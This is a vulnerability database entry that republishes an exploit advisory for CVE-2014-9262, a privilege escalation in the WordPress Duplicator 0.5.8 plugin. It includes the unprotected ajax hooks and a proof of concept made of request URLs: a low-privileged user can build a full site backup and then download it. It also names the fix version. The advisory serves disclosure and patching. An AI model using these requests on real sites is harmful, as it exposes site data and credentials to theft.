WordPress Duplicator 0.5.8 Privilege Escalation Vulnerability

🗓️ 18 Feb 2015 00:00:00Reported by Kacper SzurekType

zdt🔗 0day.today👁 27 Views

WordPress Duplicator v0.5.8 Privilege Escalation Vulnerabilit

Reporter	Title	Published	Views	Family All 7
CNVD	Wordpress Duplicator Elevation of Privilege Vulnerability	8 Aug 201700:00	–	cnvd
CVE	CVE-2014-9262	7 Aug 201717:00	–	cve
Cvelist	CVE-2014-9262	7 Aug 201717:00	–	cvelist
EUVD	EUVD-2014-9087	7 Oct 202500:30	–	euvd
NVD	CVE-2014-9262	7 Aug 201717:29	–	nvd
Prion	Design/Logic Flaw	7 Aug 201717:29	–	prion
WPVulnDB	Duplicator 0.5.8 - Privilege Escalation	19 Feb 201500:00	–	wpvulndb

# Exploit Title: Duplicator 0.5.8 Privilege Escalation
# Date: 21-11-2014
# Software Link: https://wordpress.org/plugins/duplicator/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
# CVE: CVE-2014-9262

1. Description
  
Every registered user can create and download backup files.

File: duplicator\duplicator.php
add_action('wp_ajax_duplicator_package_scan',		'duplicator_package_scan');
add_action('wp_ajax_duplicator_package_build',		'duplicator_package_build');
add_action('wp_ajax_duplicator_package_delete',		'duplicator_package_delete');
add_action('wp_ajax_duplicator_package_report',		'duplicator_package_report');

http://security.szurek.pl/duplicator-058-privilege-escalation.html

2. Proof of Concept

Login as regular user (created using wp-login.php?action=register) then start scan:

http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_scan

After that you can build backup:

http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_build

This function will return json with backup name inside File key.

You can download backup using:

http://wordpress-url/wp-snapshots/%file_name_from_json%

3. Solution:
  
Update to version 0.5.10

#  0day.today [2018-01-04]  #

18 Feb 2015 00:00Current

8.2High risk

Vulners AI Score8.2

EPSS0.07376